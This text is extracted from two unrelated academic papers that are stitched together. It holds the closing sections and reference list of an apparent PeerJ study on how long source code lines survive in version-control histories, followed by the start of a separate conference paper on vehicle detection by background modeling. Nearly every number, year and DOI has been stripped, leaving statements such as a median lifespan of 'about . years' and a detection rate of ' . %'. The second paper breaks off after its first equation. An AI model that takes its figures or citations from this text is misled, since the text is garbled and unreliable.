( ) conducted an empirical study on a large telecommunication switching system, and identified important differences in the patterns of software evolution over time of the whole system vs its subsystems. a similar strategy of separately examining the growth of subsystems of large software projects has been followed by gonzález-barahona et al. ( ) and by gonzález-barahona et al. ( ). other studies of software evolution have also identified the ripples caused by the inclusion or removal of third-party components (robles, gonzález-barahona & herraiz, ), and some, such as the one by hatton, spinellis & van genuchten ( ), have attempted to address the issue by filtering them out. as we have not performed such filtering, these changes may affect our reported results. on the other hand, filtering introduces another threat to validity due to the subjective nature of the required decisions or parameters. a related factor is the granularity of the studied commits. our study is missing many intermediary commits, first because we removed about % through history simplification, and second because many others may have occurred in third-party repositories and then pushed upstream as a single commit (german, adams & hassan, ). one could argue that the effects of history simplification should cancel out: lines would on average appear later and also disappear later. nevertheless, to quantify the effect of history simplification, we measured the interval between commits in both the complete tree and the simplified longest path. as expected, the longer time paths upstream from merges in the complete tree, which were simplified away in the linear path, gave the tree a longer interval between commits (a median of min) than its longest path ( min). however, the difference between the median value of the two intervals ( min) is five orders of magnitude smaller than the line lifespan we report, making any effect negligible. the use of git to list the differences between two file versions is also a threat. first, the employed file difference algorithm (myers, ) will display a movement of code as a deletion and an insertion. then, relatively minor changes, such as the renaming of an identifier, will appear as line deletions and insertions, which may skew the results toward higher infant mortality. we examined the effect of these two issues through methods described in the sections on the analysis of individual tokens and moved lines. also, the detection of file renaming and copying is based on a heuristic and a threshold. we used the default thresholds, only increasing the number of files that would be checked for copies; there may conceivably be better values to use. a related issue is that our investigation focuses on individual code lines. we do not take context into account. a line that is moved from one place to the next impacts both places and may cause cascading changes in the lifespans of other lines. however, the same applies in traditional survival analysis: deaths may be related to other deaths (e.g., via disease); we are interested in the lifespan of lines, no matter the relationships that may exist between them. spinellis et al. ( ), peerj comput. sci., doi . /peerj-cs. / http://dx.doi.org/ . /peerj-cs. https://peerj.com/computer-science/ given that we used custom-developed tools to track the birth and death of lines of code, human error is an inevitable factor. we tried to minimize this through numerous test cases, manual verification, and the use of internal consistency checks. 
turning to our statistical methods, we have used two statistical techniques to answer two different, but related questions. we used the kaplan–meier estimator to investigate the median lifespan of code in projects, and a weibull process to investigate the overall aging process. the kaplan–meier estimator provided us with approximations of the survival functions, while the weibull fit gave us approximations of the hazard functions. we assumed that the hazard rate is characterized by a weibull function, because the weibull distribution is a popular model for several related processes such as component failure rates, and weibull covers different aging processes depending on the value of a. moreover, we are not interested in the exact values of the parameters of the weibull distribution, but in the relation of a to 1, where we found consistent results. the remarkable agreement in the shape of the weibull distributions among many diverse projects (fig. ) leads us to believe that our findings are reproducible and generalizable.

we examined whether the lognormal distribution, which is also often used in failure models, would be a better fit for our data. to compare the two models, weibull and lognormal, we used the akaike information criterion (aic), defined as aic = 2k − 2 log(l̂), where k is the number of parameters of the model and l̂ is the maximum likelihood of the model. a lower aic value corresponds to a better fit, as this maximizes the goodness of fit, given by the log-likelihood, but penalizes the complexity of the model, given by the number of parameters. we found overwhelmingly that the weibull distribution was a better fit. only five projects had a better fit with the lognormal distribution when we examined the lines, and six projects had a better fit with the lognormal distribution when we examined the tokens (four projects were the same). we used the python lifelines package for calculating the estimates and comparing the distributions (davidson-pilon et al., ).

external validity

the generalizability of our findings is threatened by our choice of analyzed projects. although we included projects from diverse development communities, written in numerous programing languages, and serving many different application areas, we cannot claim that our choice represents adequately all software development. in particular, we feel that our sample excludes or underrepresents the following software types: small software projects, projects developed with tightly managed or formal processes, proprietary and bespoke systems, projects written in programing languages not favored by the open source community, and systems that target specific application domains rather than the provision of systems infrastructure. more importantly, our findings are based on large, successful projects that have run for several years. there are many more projects that are discontinued after a short period of time, for any reason. all lines of code in these projects freeze at an early stage of what could have been a longer period of evolution. therefore our findings cannot be generalized to all software development; this would be an instance of survival bias, reaching conclusions for all the population based only on the characteristics of the survivors.
that said, people usually aspire to create successful, long-lasting projects, so our findings are pertinent for those projects that want to achieve longevity. related work all living beings degenerate and die with age. the origin of senescence, however, remains an unsolved problem for biologists (kirkwood & austad, ). likewise, many software components evolve, age, and are eventually removed or replaced. this section presents related work regarding the fields of software evolution, aging, and decay, and records empirical studies that use the statistical method of survival analysis (elandt-johnson & johnson, ; klein & moeschberger, ). the process of software evolution refers to the modification and adaptation of software programs so that programs can survive as their environment changes. the software evolution laws of lehman ( ) describe the constraints practitioners should take into account to continuously adapt actively used software systems. a detailed literature review regarding lehman’s software evolution laws has been conducted by herraiz et al. ( ). many empirical studies focus on predictive models of software projects’ evolution at macroscopic scale. relevant studies have looked at long-term sustainability factors in the evolution of libreoffice (gamalielsson & lundell, ), the change of program dependencies in the apache ecosystem (bavota et al., ), and the early identification of source code evolution pattern in open source projects (karus, ). additionally, many empirical studies examine software evolution at the microscopic level, considering the evolution of source-code elements such as methods. in particular, bevan et al. ( ) developed kenyon, which supports different types of stratigraphic software evolution research, ranging from code feature evolution to dependency graph-based maintenance. zimmermann ( ) presented apfel for fine-grained processing of source code elements such as tokens, method calls, exceptions, and variable usages. hata, mizuno & kikuno ( ) introduced historage, which provides entire histories of fine-grained entities in java, such as methods, constructors, and fields. this tool has been applied to quantitatively evaluate the remaining change identification of open source software projects. the term software aging was coined by parnas ( ) and refers to the idea that programs, like people, are getting old. according to parnas, software aging happens for two reasons: ( ) software fails to adapt to changing needs, and ( ) software changes but in an inappropriate way (addition of bad fixes and features). given, however, that it is infeasible for developers to prevent software evolution and, consequently, software degradation, researchers attempt to limit program damages by predicting the software’s lifetime and inventing rejuvenation approaches (karus & dumas, ; li et al., ; qin et al., ; robillard & murphy, ; salfner, lenk & malek, ). in the field of software aging, empirical studies have been conducted on the identification of aging trends. in particular, robles et al. ( ) found that a system becomes “old” when it turns five. the authors also defined the absolute -year aging index to compare the relative aging of different projects. finally, cotroneo, natella & pietrantuono ( ) developed an approach that predicts the location of aging-related bugs using software complexity spinellis et al. ( ), peerj comput. sci., doi . /peerj-cs. / http://dx.doi.org/ . /peerj-cs. https://peerj.com/computer-science/ metrics and machine learning algorithms. 
they found that the most significant signs of software aging manifest themselves as: leaked memory, unterminated threads, unreleased files and locks, numerical errors, and disk fragmentation. as software evolves, developers should overcome software erosion by fighting software decay. a significant research body is also devoted to this field. eick et al. ( ) used the term code decay to describe the situation where evolving software increasingly hinders software maintenance. the authors, also, proposed measurements (code decay indices) as decay predictors. for their study, they statically analyzed millions of lines of a fifteen-year old telephone switching software system. similarly to our work, the authors tracked added and deleted source code lines. however, they did not use survival analysis and they examined a single project to find particular code decay factors. additionally, arisholm & sjøberg ( ) proposed a framework for the empirical assessment of changeability decay and araújo, monteiro & travassos ( ) built a software decay model regarding software deterioration causes. extensive work has been done on identifying and tracking code changes. kim & notkin ( ) were the first that defined the problem of matching code elements between two program versions based on syntactic and textual similarity. to compute the difference between two programs several tools have been implemented. canfora, cerulo & penta ( ) developed a technique that combines space vector models and the levenshtein edit distance for finding cvs/svn differences that occur due to line additions or deletions, as well as due to line modifications. furthermore, the lhdiff tool implements language- independent techniques to track how source code lines evolve across different versions of a software system (asaduzzaman et al., b). the tool uses the simhash technique together with heuristics. in addition, the gumtree tool identifies edits in scripts when moving code in version repositories (falleri et al., ). this tool is based on a abstract syntax tree (ast) differencing algorithm. the changedistiller is another differencing tool that is based on a tree differencing algorithm for fine-grained source code change extraction (fluri et al., ). to represent how lines evolve over time in source code version repositories researchers have also used annotation graphs (zimmermann et al., ). more recently, servant & jones ( ) proposed a fine-grained model based on optimizing the levenshtein difference between lines of successive versions. finally, cvsscan is a visual tool for representing software evolution based on the tracking of line-based source code changes extracted by using unix’s diff (voinea, telea & van wijk, ). the lifetime tool we present here, balances computational cost with accuracy by processing a series of git diff outputs and uses a state machine for the parsing of their output. other researchers have also employed the tools of survival analysis in software (elandt-johnson & johnson, ; klein & moeschberger, ). sentas, angelis & stamelos ( ) developed a statistical framework based on survival analysis and the kaplan–meier estimator (kaplan & meier, ) to predict the duration of software projects and the factors that affect it. the authors applied their approach on proprietary software projects taking into account industrial factors that have an impact on a project’s lifetime. they found that the median duration of the examined projects is months. similarly, spinellis et al. ( ), peerj comput. sci., doi . /peerj-cs. 
/ http://dx.doi.org/ . /peerj-cs. https://peerj.com/computer-science/ samoladas, angelis & stamelos ( ) applied survival analysis on , open source projects to forecast software evolution trends. the authors observed that projects that existed more than ten years ago continue to evolve. comparably, our insights confirm that code in long-lived projects lives longer. scanniello ( ) used the kaplan–meier estimator on five software projects (at method level) to investigate how dead code affects software evolution. our finding regarding the lower hazard of older lines is mirrored by zheng et al. ( ) who report that in gentoo linux packages, a network graph new node is connected to an old node with a probability that depends not only on the degree but also on the age of the old node. other survival analysis studies include the one by claes et al. ( ) on the longevity of debian packages with conflicts and the one by goeminne & mens ( ) on the survival and influence of five java database frameworks. to the best of our knowledge, this article is the first work that uses survival analysis to track the birth and death of code lines and tokens over periods that span decades, and presents a theoretical and statistical model regarding the aging process of code lines. another research strand that the study of the evolution of fine-grained code elements is related to includes genetic improvement. genetic improvement (gi) uses automated search (i.e., optimization and machine learning techniques) in order to improve existing software. typically, gi involves making small changes or edits (also known as mutations) in source-code elements (i.e., lines of code or tokens) to improve existing software. topics covered by gi research include program transformation, approximate computing, and program repair (petke et al., ). as an example, petke et al. ( ) apply gi with automated code transplantation, by mutating the code at the level of lines of source code, to improve software performance. additionally, barr et al. ( ) introduced the plastic surgery hypothesis, which states that changes to a codebase refer to source code elements that already exist in the codebase at the time of a change. related work (nguyen et al., ; goues, forrest & weimer, ) considers repetitiveness of code changes (abstracted to abstract syntax trees) that is associated with the plastic surgery hypothesis. furthermore, martinez, weimer & monperrus ( ) consider changes that could be constructed based on existing code snippets. therefore, the study of the evolution of code elements, such as code lines or tokens that we take into account here, could help, in the future, in the guidance of software improvement based on evolutionary approaches. conclusions and implications when we began working on this study, we did not know whether code lines were durable or perishable and whether their demise was a result of infant mortality or senescence. by devising a method and implementing tools to follow source code lines from revision control repositories from their birth to their demise, we were able to arrive at the answers through the statistical analysis of . billion source code lifetime events. we found that code lines are durable with a median lifespan of about . years, the corresponding median for the tokens is . years, and that the associated hazard rate decreases over time following a weibull distribution; that is, young lines are more likely to spinellis et al. ( ), peerj comput. sci., doi . /peerj-cs. / http://dx.doi.org/ . /peerj-cs. 
https://peerj.com/computer-science/ be modified or deleted. we investigated whether line and token longevity are associated with particular line and token features, developer experience and tenure in a project, and programing language. our results did not show strong patterns, indicating that line and token longevity may be the result of a complex interaction of various, potentially context specific, factors. project age and project size had a small correlation with code longevity. on the practical front, our model, suitably calibrated, can provide input for estimating maintenance effort, while the corresponding tool could aid the management of technical debt and the risk assessment of software vulnerabilities. our model derives statistical estimates of lifespan estimates and hazard rates, based on the source code of projects. they can be run on other projects, apart from the ones we used, to give the calibrated figures for them. knowing how lines and token age (or churn) in a project may help in managing technical debt and risk assessment (ozment & schechter, ; shin et al., ). for example, a large number of long-lived lines/tokens can be a sign of stability or “don’t touch” status. moreover, our regression model of lines lifespan vs project lifespan can be used against a particular project to gauge where it stands, or whether (perhaps problematically) it is an outlier. all these potential uses need to be empirically validated in future studies. on the research front, the study of code evolution at the level of individual lines can be extended both theoretically and in empirical breadth and depth. on the theoretical side, significant work is required to establish the precise mechanisms underlying the observed hazard rate. features we did not examine here, such as as the interplay of requirements, architecture, and syntax, might be worthy candidates for further study. corresponding theories should then be empirically evaluated using our methods and tools. on the breadth side examining more, and more diverse, repositories will strengthen the generalizability of our findings. tying together this area’s research and practical implications is the enticing quest to identify and control factors that do play a role in the lifetime of code elements. once these are nailed down, software engineering practices can be correspondingly adjusted so as to reduce potentially wasteful effort by delivering code lines with longer lifespans. this line of research can lead to a new promising and exciting avenue for improving the efficiency of software development. acknowledgements the authors thank alexander chatzigeorgiou for his valuable and timely feedback. this work’s first author thanks michiel van genuchten and les hatton for their fruitful collaboration on software growth modeling. additional information and declarations funding the project associated with this work has received funding from the european union’s horizon research and innovation program under grant agreement no. . spinellis et al. ( ), peerj comput. sci., doi . /peerj-cs. / http://dx.doi.org/ . /peerj-cs. https://peerj.com/computer-science/ the funders had no role in study design, data collection and analysis, decision to publish, or preparation of the manuscript. grant disclosures the following grant information was disclosed by the authors: european union’s horizon: . competing interests the authors declare that they have no competing interests. 
author contributions � diomidis spinellis conceived and designed the experiments, performed the experiments, analyzed the data, performed the computation work, prepared figures and/or tables, authored or reviewed drafts of the paper, and approved the final draft. � panos louridas analyzed the data, performed the computation work, prepared figures and/or tables, authored or reviewed drafts of the paper, and approved the final draft. � maria kechagia analyzed the data, authored or reviewed drafts of the paper, and approved the final draft. data availability the following information was supplied regarding data availability: data and source code are available on zenodo: doi . /zenodo. . - spinellis, diomidis, louridas, panos, & kechagia, maria. ( ). evolution of software code at the level of fine-grained elements: data files (version . ) [data set]. zenodo. doi . /zenodo. . - kechagia, maria, louridas, panos, & kechagia, maria. ( , december ). evolution of software code at the level of fine-grained elements: source code. zenodo. doi . /zenodo. . references albrecht aj, gaffney je. . software function, source lines of code, and development effort prediction: a software science validation. ieee transactions on software engineering se- ( ): – doi . /tse. . . allamanis m, barr et, devanbu p, sutton c. . a survey of machine learning for big code and naturalness. acm computing surveys ( ): – doi . / . alon u, zilberstein m, levy o, yahav e. . code vec: learning distributed representations of code. proceedings of the acm on programming languages (popl): – doi . / . araújo map, monteiro vf, travassos gh. . towards a model to support in silico studies of software evolution. in: proceedings of the acm-ieee international symposium on empirical software engineering and measurement, esem ’ . – . arisholm e, sjøberg dik. . towards a framework for empirical assessment of changeability decay. journal of systems and software ( ): – doi . /s - ( ) - . asaduzzaman m, roy ck, schneider ka, di penta m. a. lhdiff: a language-independent hybrid approach for tracking source code lines. in: icsm : th ieee international conference on software maintenance. piscataway: ieee, – . spinellis et al. ( ), peerj comput. sci., doi . /peerj-cs. / https://dx.doi.org/ . /zenodo. http://dx.doi.org/ . /zenodo. http://dx.doi.org/ . /zenodo. http://dx.doi.org/ . /tse. . http://dx.doi.org/ . / http://dx.doi.org/ . / http://dx.doi.org/ . /s - ( ) - http://dx.doi.org/ . /peerj-cs. https://peerj.com/computer-science/ asaduzzaman m, roy ck, schneider ka, penta md. b. lhdiff: tracking source code lines to support software maintenance activities. in: ieee international conference on software maintenance. – . atkins dl, ball t, graves tl, mockus a. . using version control data to evaluate the impact of software tools: a case study of the version editor. ieee transactions on software engineering ( ): – doi . /tse. . . barnes jm, pandey a, garlan d. . automated planning for software architecture evolution. in: th ieee/acm international conference on automated software engineering (ase ’ ). – . barr et, brun y, devanbu p, harman m, sarro f. . the plastic surgery hypothesis. in: proceedings of the nd acm sigsoft international symposium on foundations of software engineering, fse . new york: association for computing machinery, – . bavota g, canfora g, penta md, oliveto r, panichella s. . the evolution of project inter-dependencies in a software ecosystem: the case of apache. 
in: proceedings of the th ieee international conference on software maintenance, icsm ’ . washington: ieee computer society, – . bevan j, whitehead ej, kim s, godfrey m. . facilitating software evolution research with kenyon. in: proceedings of the th european software engineering conference held jointly with th acm sigsoft international symposium on foundations of software engineering, esec/fse- . new york: association for computing machinery, – . breivold hp, crnkovic i, larsson m. . a systematic review of software architecture evolution research. information and software technology ( ): – doi . /j.infsof. . . . buse rp, weimer wr. . a metric for software readability. in: proceedings of the international symposium on software testing and analysis, issta ’ . new york: acm, – . canfora g, cerulo l, penta md. . identifying changed source code lines from version repositories. in: proceedings of the th international workshop on mining software repositories, msr ’ . washington, d.c: ieee computer society, . claes m, mens t, di cosmo r, vouillon j. . a historical analysis of debian package incompatibilities. in: proceedings of the th working conference on mining software repositories, msr ’ . piscataway: ieee press, – . cotroneo d, natella r, pietrantuono r. . predicting aging-related bugs using software complexity metrics. performance evaluation ( ): – doi . /j.peva. . . . davidson-pilon c, kalderstam j, jacobson n, sean r, kuhn b, zivich p, williamson m, abdeali jk, datta d, fiore-gartland d, parij a, wilson a, gabriel d, moneda l, moncada-torres a, stark k, gadgil h, jona s, besson k, peña ms, anton s, klintberg a, growth j, noorbakhsh j, begun m, kumar r, hussey s, golland d, jlim . . camdavidsonpilon/lifelines: v . . . doi . /zenodo. . kaplan el, meier p. . nonparametric estimation from incomplete observations. journal of the american statistical association ( ): – doi . / . . . eick sg, graves tl, karr af, marron js, mockus a. . does code decay? assessing the evidence from change management data. ieee transactions on software engineering ( ): – doi . / . . elandt-johnson rc, johnson nl. . survival models and data analysis. hoboken: wiley. falleri j-r, morandat f, blanc x, martinez m, monperrus m. . fine-grained and accurate source code differencing. in: proceedings of the th acm/ieee international conference on automated software engineering, ase ’ , new york: acm, – . spinellis et al. ( ), peerj comput. sci., doi . /peerj-cs. / http://dx.doi.org/ . /tse. . http://dx.doi.org/ . /j.infsof. . . http://dx.doi.org/ . /j.peva. . . http://dx.doi.org/ . /zenodo. http://dx.doi.org/ . / . . http://dx.doi.org/ . / . http://dx.doi.org/ . /peerj-cs. https://peerj.com/computer-science/ fluri b, wuersch m, pinzger m, gall h. . change distilling: tree differencing for fine-grained source code change extraction. ieee transactions on software engineering ( ): – doi . /tse. . . fowler m. . refactoring: improving the design of existing code. boston: addison-wesley. gall h, jazayeri m, klosch rr, trausmuth g. . software evolution observations based on product release history. in: proceedings international conference on software maintenance. – . gamalielsson j, lundell b. . sustainability of open source software communities beyond a fork: how and why has the libreoffice project evolved? journal of systems and software : – doi . /j.jss. . . . german dm, adams b, hassan ae. . continuously mining distributed version control systems: an empirical study of how linux uses git. 
empirical software engineering ( ): – doi . /s - - - . german dm, adams b, stewart k. . cregit: token-level blame information in git version control repositories. empirical software engineering : – . giger e, pinzger m, gall hc. . comparing fine-grained source code changes and code churn for bug prediction. in: proceedings of the th working conference on mining software repositories, msr ’ . new york: acm, – . godfrey mw, tu q. . evolution in open source software: a case study. in: proceedings of the international conference on software maintenance, icsm ’ . piscataway: ieee, – . goeminne m, mens t. . towards a survival analysis of database framework usage in java projects. in: proceedings of the st ieee international conference on software maintenance and evolution. – . gonzález-barahona jm, robles g, herraiz i, ortega f. . studying the laws of software evolution in a long-lived floss project. journal of software: evolution and process ( ): – doi . /smr. . gonzález-barahona jm, robles g, michlmayr m, amor jj, german dm. . macro-level software evolution: a case study of a large software compilation. empirical software engineering ( ): – doi . /s - - -x. gordon ad, henzinger ta, nori av, rajamani sk. . probabilistic programming. in: proceedings of the on future of software engineering, fose . new york: acm, – . goues c, forrest s, weimer w. . current challenges in automatic software repair. software quality journal ( ): – doi . /s - - - . gousios g, kalliamvakou e, spinellis d. . measuring developer contribution from software repository data. in: proceedings of the international working conference on mining software repositories, msr ’ . new york: acm, – . gousios g, spinellis d. . ghtorrent: github’s data from a firehose. in: lanza m, penta md, xie t, eds. th ieee working conference on mining software repositories (msr). piscataway: ieee, – . gousios g, spinellis d. . mining software engineering data from github. in: proceedings of the th international conference on software engineering companion, icse-c ’ . piscataway: ieee press, – . hata h, mizuno o, kikuno t. . historage: fine-grained version control system for java. in: proceedings of the th international workshop on principles of software evolution and the th annual ercim workshop on software evolution, iwpse-evol ’ . new york: association for computing machinery, – . spinellis et al. ( ), peerj comput. sci., doi . /peerj-cs. / http://dx.doi.org/ . /tse. . http://dx.doi.org/ . /j.jss. . . http://dx.doi.org/ . /s - - - http://dx.doi.org/ . /smr. http://dx.doi.org/ . /s - - -x http://dx.doi.org/ . /s - - - http://dx.doi.org/ . /peerj-cs. https://peerj.com/computer-science/ hatton l, spinellis d, van genuchten m. . the long-term growth rate of evolving software: empirical results and implications. journal of software: evolution and process ( ):e . heckel p. . a technique for isolating differences between files. communications of the acm ( ): – doi . / . . herraiz i, gonzález-barahona jm, robles g. . towards a theoretical model for software growth. in: proceedings of the th international workshop on mining software repositories, msr ’ . washington, dc: ieee computer society, . herraiz i, rodriguez d, robles g, gonzález-barahona jm. . the evolution of the laws of software evolution: a discussion based on a systematic literature review. acm computing surveys ( ): : – : doi . / . . humphrey ws. . managing the software process. reading: addison-wesley. ince d, hatton l, graham-cumming j. . the case for open program code. nature ( ): – doi . 
/nature . jiang s, armaly a, mcmillan c. . automatically generating commit messages from diffs using neural machine translation. in: proceedings of the nd ieee/acm international conference on automated software engineering, ase . piscataway: ieee press, – . kan sh. . metrics and models in software quality engineering. second edition. boston: addison-wesley longman publishing co., inc. karus s. . automatic means of identifying evolutionary events in software development. in: proceedings of the th ieee international conference on software maintenance, icsm ’ . piscataway: ieee, – . karus s, dumas m. . code churn estimation using organisational and code metrics: an experimental comparison. information and software technology ( ): – doi . /j.infsof. . . . kechagia m, devroey x, panichella a, gousios g, van deursen a. . effective and efficient api misuse detection via exception propagation and search-based testing. in: proceedings of the th acm sigsoft international symposium on software testing and analysis, issta . new york: acm, – . kim m, notkin d. . program element matching for multi-version program analyses. in: proceedings of the international workshop on mining software repositories, msr ’ . new york: acm, – . kirkwood tb, austad sn. . why do we age? nature ( ): – doi . / . klein jp, moeschberger ml. . survival analysis: techniques for censored and truncated data. second edition. springer. kruchten p, nord rl, ozkaya i. . technical debt: from metaphor to theory and practice. ieee software ( ): – doi . /ms. . . lehman mm. . programs, cities, students—limits to growth? in: gries d, ed. programming methodology: a collection of articles by members of ifip wg . . new york: springer, – . lehman mm. . programs, life cycles, and laws of software evolution. proceedings of the ieee ( ): – doi . /proc. . . li x, li yf, xie m, ng sh. . reliability analysis and optimal version-updating for open source software. information and software technology ( ): – doi . /j.infsof. . . . lind rk, vairavan k. . an experimental investigation of software metrics and their relationship to software development effort. ieee transanctions on software engineering ( ): – doi . / . . spinellis et al. ( ), peerj comput. sci., doi . /peerj-cs. / http://dx.doi.org/ . / . http://dx.doi.org/ . / . http://dx.doi.org/ . /nature http://dx.doi.org/ . /j.infsof. . . http://dx.doi.org/ . / http://dx.doi.org/ . /ms. . http://dx.doi.org/ . /proc. . http://dx.doi.org/ . /j.infsof. . . http://dx.doi.org/ . / . http://dx.doi.org/ . /peerj-cs. https://peerj.com/computer-science/ løhre e, jørgensen m. . numerical anchors and their strong effects on software development effort estimates. journal of systems and software : – doi . /j.jss. . . . mäntylä mv, lassenius c. . subjective evaluation of software evolvability using code smells: an empirical study. empirical software engineering ( ): – . martinez m, weimer w, monperrus m. . do the fix ingredients already exist? an empirical inquiry into the redundancy assumptions of program repair approaches. in: companion proceedings of the th international conference on software engineering, icse companion . new york: association for computing machinery, – . munaiah n, kroh s, cabrey c, nagappan m. . curating github for engineered software projects. empirical software engineering ( ): – doi . /s - - - . myers ew. . an o(nd) difference algorithm and its variations. algorithmica ( – ): – doi . /bf . nguyen ha, nguyen at, nguyen tt, nguyen tn, rajan h. . 
a study of repetitiveness of code changes in software evolution. in: th ieee/acm international conference on automated software engineering (ase). – . nguyen hv, nguyen ha, nguyen tt, nguyen at, nguyen tn. . detection of embedded code smells in dynamic web applications. in: proceedings of the th ieee/acm international conference on automated software engineering, ase . new york: association for computing machinery, – . nugroho ys, hata h, matsumoto k. . how different are different diff algorithms in git? empirical software engineering ( ): – doi . /s - - -z. ozment a, schechter se. . milk or wine: does software security improve with age? in: proceedings of the th conference on usenix security symposium. berkeley: usenix association. padgett wj. . weibull distribution. in: lovric m, ed. international encyclopedia of statistical science. berlin: springer, – . parnas dl. . software aging. in: proceedings of the th international conference on software engineering, icse ’ . los alamitos: ieee computer society press, – . penta md, cerulo l, aversano l. . the life and death of statically detected vulnerabilities: an empirical study. information and software technology ( ): – doi . /j.infsof. . . . petke j, haraldsson so, harman m, langdon wb, white dr, woodward jr. . genetic improvement of software: a comprehensive survey. ieee transactions on evolutionary computation ( ): – doi . /tevc. . . petke j, harman m, langdon wb, weimer w. . using genetic improvement and code transplants to specialise a c++ program to a problem class. in: nicolau m, krawiec k, heywood mi, castelli m, garcía-sánchez p, merelo jj, rivas santos vm, sim k, eds. genetic programming. berlin: springer, – . qin f, tucek j, sundaresan j, zhou y. . rx: treating bugs as allergies—a safe method to survive software failures. in: proceedings of the th acm symposium on operating systems principles, sosp ’ . new york: acm, – . robillard mp, murphy gc. . representing concerns in source code. acm transactions on software engineering and methodology ( ): doi . / . . robles g, amor jj, gonzalez-barahona jm, herraiz i. . evolution and growth in large libre software projects. in: eighth international workshop on principles of software evolution (iwpse’ ). – . spinellis et al. ( ), peerj comput. sci., doi . /peerj-cs. / http://dx.doi.org/ . /j.jss. . . http://dx.doi.org/ . /s - - - http://dx.doi.org/ . /bf http://dx.doi.org/ . /s - - -z http://dx.doi.org/ . /j.infsof. . . http://dx.doi.org/ . /tevc. . http://dx.doi.org/ . / . http://dx.doi.org/ . /peerj-cs. https://peerj.com/computer-science/ robles g, gonzález-barahona jm, herraiz i. . an empirical approach to software archaeology. in: poster proceedings of the international conference on software maintenance, icsm ’ . – . rodríguez d, sicilia m, garcÃa e, harrison r. . empirical findings on team size and productivity in software development. journal of systems and software ( ): – doi . /j.jss. . . . salfner f, lenk m, malek m. . a survey of online failure prediction methods. acm computing surveys ( ): – doi . / . . samoladas i, angelis l, stamelos i. . survival analysis on the duration of open source projects. information and software technology ( ): – doi . /j.infsof. . . . scanniello g. . source code survival with the kaplan meier. in: proceedings of the th ieee international conference on software maintenance, icsm ’ . – . sentas p, angelis l, stamelos i. . a statistical framework for analyzing the duration of software projects. empirical software engineering ( ): – doi . /s - - - . 
servant f, jones ja. . fuzzy fine-grained code-history analysis. in: proceedings of the th international conference on software engineering, icse ’ . los alamitos: ieee computer society press. sharma t, fragkoulis m, spinellis d. . does your configuration code smell? in: ieee/acm th working conference on mining software repositories (msr). los alamitos: ieee computer society, – . shin y, meneely a, williams l, osborne ja. . evaluating complexity, code churn, and developer activity metrics as indicators of software vulnerabilities. ieee transactions on software engineering ( ): – doi . /tse. . . spinellis d. a. how can i obtain with git log a series of patches that can be auto-applied? available at http://www.webcitation.org/ jyf ue . spinellis d. b. a repository of unix history and evolution. empirical software engineering : – . spinellis d. . dspinellis/tokenizer: version . . available at https://github.com/dspinellis/ tokenizer/. spinellis d, kotti z, mockus a. . a dataset for github repository deduplication. in: th international conference on mining software repositories, msr ’ . new york: association for computing machinery, – . stamelos i, angelis l, oikonomou a, bleris gl. . code quality analysis in open source software development. information systems journal ( ): – doi . /j. - . . .x. vallée-rai r, co p, gagnon e, hendren l, lam p, sundaresan v. . soot: a java bytecode optimization framework. in: cascon first decade high impact papers, cascon ’ . riverton: ibm corp, – . van genuchten m, hatton l. . metrics with impact. ieee software ( ): – doi . /ms. . . voinea l, telea a, van wijk jj. . cvsscan: visualization of code evolution. in: proceedings of the acm symposium on software visualization, softvis– . new york: association for computing machinery, – . spinellis et al. ( ), peerj comput. sci., doi . /peerj-cs. / http://dx.doi.org/ . /j.jss. . . http://dx.doi.org/ . / . http://dx.doi.org/ . /j.infsof. . . http://dx.doi.org/ . /s - - - http://dx.doi.org/ . /tse. . http://www.webcitation.org/ jyf ue https://github.com/dspinellis/tokenizer/ https://github.com/dspinellis/tokenizer/ http://dx.doi.org/ . /j. - . . .x http://dx.doi.org/ . /ms. . http://dx.doi.org/ . /peerj-cs. https://peerj.com/computer-science/ white m, vendome c, linares-vásquez m, poshyvanyk d. . toward deep learning software repositories. in: proceedings of the th working conference on mining software repositories, msr ’ . piscataway: ieee press, – . zhang h. . an investigation of the relationships between lines of code and defects. in: proceedings of the th ieee international conference on software maintenance, icsm ’ . – . zheng x, zeng d, li h, wang f. . analyzing open-source software systems as complex networks. physica a: statistical mechanics and its applications ( ): – doi . /j.physa. . . . zimmermann t. . fine-grained processing of cvs archives with apfel. in: proceedings of the oopsla workshop on eclipse technology exchange, eclipse ’ . new york: association for computing machinery, – . zimmermann t, kim s, zeller a, whitehead ej jr. . mining version archives for co-changed lines. in: proceedings of the international workshop on mining software repositories, msr ’ . new york: acm, – . zimmermann t, zeller a, weissgerber p, diehl s. . mining version histories to guide software changes. ieee transactions on software engineering ( ): – doi . /tse. . . spinellis et al. ( ), peerj comput. sci., doi . /peerj-cs. / http://dx.doi.org/ . /j.physa. . . http://dx.doi.org/ . /tse. . 
international conference on sensor network and computer engineering (icsnce ) research on vehicle detection method based on background modeling zhichao lian school of computer science and engineering xi'an technological university xi'an , china e-mail: @qq.com zhongsheng wang school of computer science and engineering xi'an technological university xi'an , china e-mail: wangzhongsheng@xatu.edu.cn

abstract—this paper mainly studies the background difference method in the field of intelligent traffic, proposes a background modeling method based on frame difference, and compares it with the statistical average background model and the gaussian distribution background modeling method. the vehicle contour is then obtained by the morphological method. finally, experiments were carried out on normal road traffic surveillance videos; the effective detection rate of the method used in this paper reaches . %, which indicates a certain degree of practical applicability. the algorithm still needs to be further tested in more complex weather and different road conditions.

keywords—vehicle detection; background modeling; inter-frame difference; morphological method

i. introduction
in practical applications, a vehicle detection method with fast response, high accuracy, and good adaptability is a key part of intelligent traffic detection and management. detecting moving objects in video is affected by many complicated conditions. three kinds of methods are commonly used for detecting moving vehicles: the difference method, the optical flow method, and the background difference method. currently, the difference method includes the inter-frame difference method and the time difference method. the inter-frame difference method has a fast detection speed and a simple algorithm, and can be used in scenes with high real-time requirements. the time difference method is suitable for dynamically changing scenes but is not suited to completely segmenting moving objects. the optical flow method performs poorly in terms of real-time operation and practicality, and it is difficult for it to meet the requirements of real-time detection of moving vehicles. the background difference method gives good results in both speed and detection quality when the camera is relatively stable. the background difference method focuses on how to set up the background and dynamically update it in real time. this article uses the background difference method.

ii. commonly used background modeling and update models
in monitoring applications, the background difference method needs to establish a background reference frame. establishing an accurate and robust background model is the key to the system; the accuracy of the reference frame directly affects the output. the commonly used background models are the statistical average method and the gaussian distribution background model.

a. statistical average method background model
the statistical average method, also called the mean method, is essentially a statistical filtering idea. over a period of time, the collected images are added together and the average value is taken as the reference background model. that is, the gray-level average of n frames in the image sequence is used as the estimate of the background image, to weaken the interference of moving objects on the background. the specific calculation is shown in equation (1):

avg_k = (f_k + f_(k−1) + … + f_(k−n+1)) / n    (1)

